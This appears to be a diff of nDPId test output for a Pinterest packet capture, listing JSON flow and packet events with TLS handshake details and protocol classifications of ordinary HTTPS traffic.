-00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289710318,"flow_last_seen":1605289710318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289710318,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605289710318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710318,"pkt":"qtsDr8lk5EKm5WPyht1gCMmjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYwBu9VDYL21LWgegBAB9TESAAABAQgKz6ojDMK4Yvg="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605289710576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710576,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBjLUtaB7VQ2C+gBALgY8wAAABAQgKwrkTpM+oCrY="} 
+00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289712203,"flow_last_seen":1605289712203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289712203,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605289712203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712203,"pkt":"qtsDr8lk5EKm5WPyht1gAqhwACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBwAAAAAAACAKn6wBu\/7xm0eeabeVgBAB9aoLAAABAQgKp4B90cK4Zak="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605289712420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgHAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbufrJ5pt5X+8ZtIgBAL8Z94AAABAQgKwrka9Kd\/yRw="} 
+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289713743,"flow_last_seen":1605289713743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289713743,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMAAAAAAoAL9INluAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoQAAAAAoAL9IDStAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 
+00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGkAAAAAoAL9INWDAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2UAAAAAoAL9IGEKAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWeOms5zmKAxNmoBJXgFEqAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoWjvEV3gBAB+5BsAAABAQgK1mIgKsK5Ifo="} 